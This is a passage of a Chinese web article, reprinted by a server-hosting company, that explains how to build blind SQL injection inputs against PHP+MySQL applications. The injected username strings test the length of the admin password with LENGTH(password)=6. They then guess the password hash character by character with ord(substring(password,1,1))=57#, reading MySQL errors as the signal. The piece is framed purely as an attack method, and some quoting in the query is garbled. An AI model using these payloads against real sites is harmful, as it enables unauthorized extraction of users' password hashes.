攻击方法：谈php+mysql注射语句构造

　　相当于:

　　$q = "select id,group_id from $user_table where username=''admin'' AND LENGTH(password)=6''"

　　如果LENGTH(password)=6成立，则正常返回，如果不成立，mysql就会报错。

　　这样我们就可以猜解用户admin密码hash了。如$username=admin'' ord(substring(password,1,1))=57#

　　可以猜用户的密码第一位的ascii码值............。

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!